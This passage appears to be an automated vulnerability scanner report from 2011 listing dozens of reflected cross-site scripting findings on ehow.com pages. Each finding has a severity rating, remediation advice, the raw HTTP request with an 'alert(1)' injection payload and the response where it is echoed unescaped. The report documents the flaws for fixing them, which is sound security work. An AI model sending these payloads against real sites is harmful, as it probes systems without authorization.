GET /how_5073161_convert-wps-file-extension.html?fa220'-alert(1)-'daadd8a210=1 HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:16:04 GMT Server: Microsoft-IIS/6.0 ETag: X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 75425
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3fab0'-alert(1)-'239e708e54d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /how_5215115_change-startup-programs-windows-7.html?3fab0'-alert(1)-'239e708e54d=1 HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:15:46 GMT Server: Microsoft-IIS/6.0 ETag: X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 82368
1.399. http://www.ehow.com/how_5381925_make-roof-rake.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ehow.com
Path:
/how_5381925_make-roof-rake.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2c848'-alert(1)-'b133b6ee46a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /how_5381925_make-roof-rake.html?2c848'-alert(1)-'b133b6ee46a=1 HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:14:26 GMT Server: Microsoft-IIS/6.0 ETag: X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 74849
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 64ee4'-alert(1)-'f456c4201c4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /how_5521182_avoid-seasonal-affective-disorder-sad.html?64ee4'-alert(1)-'f456c4201c4=1 HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:16:12 GMT Server: Microsoft-IIS/6.0 ETag: X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 87639
1.401. http://www.ehow.com/how_5809012_create-indoor-gardens.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ehow.com
Path:
/how_5809012_create-indoor-gardens.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7f6ce'-alert(1)-'4ee6a37a499 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /how_5809012_create-indoor-gardens.html?7f6ce'-alert(1)-'4ee6a37a499=1 HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:16:12 GMT Server: Microsoft-IIS/6.0 ETag: X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 78342
1.402. http://www.ehow.com/how_6469141_improve-english-grammar-skills.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ehow.com
Path:
/how_6469141_improve-english-grammar-skills.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload de2cc'-alert(1)-'9bd54b7ec50 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /how_6469141_improve-english-grammar-skills.html?de2cc'-alert(1)-'9bd54b7ec50=1 HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:16:10 GMT Server: Microsoft-IIS/6.0 ETag: X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 76525
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6ccc4'-alert(1)-'eff1c631b84 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /how_7496527_resolve-5-common-grammar-problems.html?6ccc4'-alert(1)-'eff1c631b84=1 HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:14:50 GMT Server: Microsoft-IIS/6.0 ETag: X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 83128
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 41305'-alert(1)-'0c6f72547ad was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /how_7744253_attach-mini-shades-update-chandelier.html?41305'-alert(1)-'0c6f72547ad=1 HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:15:09 GMT Server: Microsoft-IIS/6.0 ETag: X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 73984
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>How to Attach Mini Shades to Update a Chandelier ...[SNIP]... <script language="javascript" type="text/javascript"> try { var OriginalURL = '/how_7744253_attach-mini-shades-update-chandelier.html?41305'-alert(1)-'0c6f72547ad=1'; } catch (e) { OriginalURL = ''; } try { if ((typeof(OriginalURL) == 'undefined') || (OriginalURL == null) || (OriginalURL == '')) { window.OriginalURL = '/how_7744253_attach-mini-shade ...[SNIP]...
1.405. http://www.ehow.com/how_7856914_prevent-chimney-fires.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ehow.com
Path:
/how_7856914_prevent-chimney-fires.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fbf8e'-alert(1)-'76a29eab4ee was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /how_7856914_prevent-chimney-fires.html?fbf8e'-alert(1)-'76a29eab4ee=1 HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:14:41 GMT Server: Microsoft-IIS/6.0 ETag: X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 72453
1.406. http://www.ehow.com/how_9191_program-rca-universal.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ehow.com
Path:
/how_9191_program-rca-universal.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9a74c'-alert(1)-'8d434bae862 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /how_9191_program-rca-universal.html?9a74c'-alert(1)-'8d434bae862=1 HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:16:04 GMT Server: Microsoft-IIS/6.0 ETag: X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 83715
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>How to Program an RCA Universal Remote Control | ...[SNIP]... <script language="javascript" type="text/javascript"> try { var OriginalURL = '/how_9191_program-rca-universal.html?9a74c'-alert(1)-'8d434bae862=1'; } catch (e) { OriginalURL = ''; } try { if ((typeof(OriginalURL) == 'undefined') || (OriginalURL == null) || (OriginalURL == '')) { window.OriginalURL = '/how_9191_program-rca-universa ...[SNIP]...
1.407. http://www.ehow.com/internet/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ehow.com
Path:
/internet/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7d46d'-alert(1)-'33313014650 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /internet/?7d46d'-alert(1)-'33313014650=1 HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:13:19 GMT Server: Microsoft-IIS/6.0 ETag: X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 72670
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Internet - How To Information | eHow.com</title> ...[SNIP]... <fb:like href="http://www.ehow.com/internet/?7d46d'-alert(1)-'33313014650=1" ref="like" width="300"> ...[SNIP]...
1.408. http://www.ehow.com/job-search-and-employment/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ehow.com
Path:
/job-search-and-employment/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4e424'-alert(1)-'d58b620fb9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /job-search-and-employment/?4e424'-alert(1)-'d58b620fb9=1 HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:13:18 GMT Server: Microsoft-IIS/6.0 ETag: X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 72349
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Job Search & Employment - How To Information | eH ...[SNIP]... <fb:like href="http://www.ehow.com/job-search-and-employment/?4e424'-alert(1)-'d58b620fb9=1" ref="like" width="300"> ...[SNIP]...
1.409. http://www.ehow.com/lawn-and-garden/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ehow.com
Path:
/lawn-and-garden/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9de4d'-alert(1)-'a2435ec230d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /lawn-and-garden/?9de4d'-alert(1)-'a2435ec230d=1 HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:13:28 GMT Server: Microsoft-IIS/6.0 ETag: X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 67905
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Lawn & Garden - How To Information | eHow.com</ti ...[SNIP]... <fb:like href="http://www.ehow.com/lawn-and-garden/?9de4d'-alert(1)-'a2435ec230d=1" ref="like" width="300"> ...[SNIP]...
1.410. http://www.ehow.com/legal/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ehow.com
Path:
/legal/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7c967'-alert(1)-'f0d7f914f94 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /legal/?7c967'-alert(1)-'f0d7f914f94=1 HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:13:45 GMT Server: Microsoft-IIS/6.0 ETag: X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 73302
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Legal - How To Information | eHow.com</title>
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 10d4f'-alert(1)-'1fbf08c4b2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /list_6515049_common-english-grammar-mistakes.html?10d4f'-alert(1)-'1fbf08c4b2=1 HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:16:06 GMT Server: Microsoft-IIS/6.0 ETag: X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 73897
1.412. http://www.ehow.com/list_7189463_grammar-check-tools.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ehow.com
Path:
/list_7189463_grammar-check-tools.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8f696'-alert(1)-'36d4bf4f664 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /list_7189463_grammar-check-tools.html?8f696'-alert(1)-'36d4bf4f664=1 HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:16:11 GMT Server: Microsoft-IIS/6.0 ETag: X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 74112
1.413. http://www.ehow.com/mental-health/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ehow.com
Path:
/mental-health/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6eff9'-alert(1)-'f101b15d2dd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mental-health/?6eff9'-alert(1)-'f101b15d2dd=1 HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:13:52 GMT Server: Microsoft-IIS/6.0 ETag: X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 70531
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Mental Health - How To Information | eHow.com</ti ...[SNIP]... <fb:like href="http://www.ehow.com/mental-health/?6eff9'-alert(1)-'f101b15d2dd=1" ref="like" width="300"> ...[SNIP]...
1.414. http://www.ehow.com/music/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ehow.com
Path:
/music/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c895b'-alert(1)-'64cf7ef5a86 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /music/?c895b'-alert(1)-'64cf7ef5a86=1 HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:13:55 GMT Server: Microsoft-IIS/6.0 ETag: X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 70451
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Music - How To Information | eHow.com</title>
1.415. http://www.ehow.com/parenting/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ehow.com
Path:
/parenting/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d92b9'-alert(1)-'0c6c4fea76f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /parenting/?d92b9'-alert(1)-'0c6c4fea76f=1 HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:13:52 GMT Server: Microsoft-IIS/6.0 ETag: X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 71130
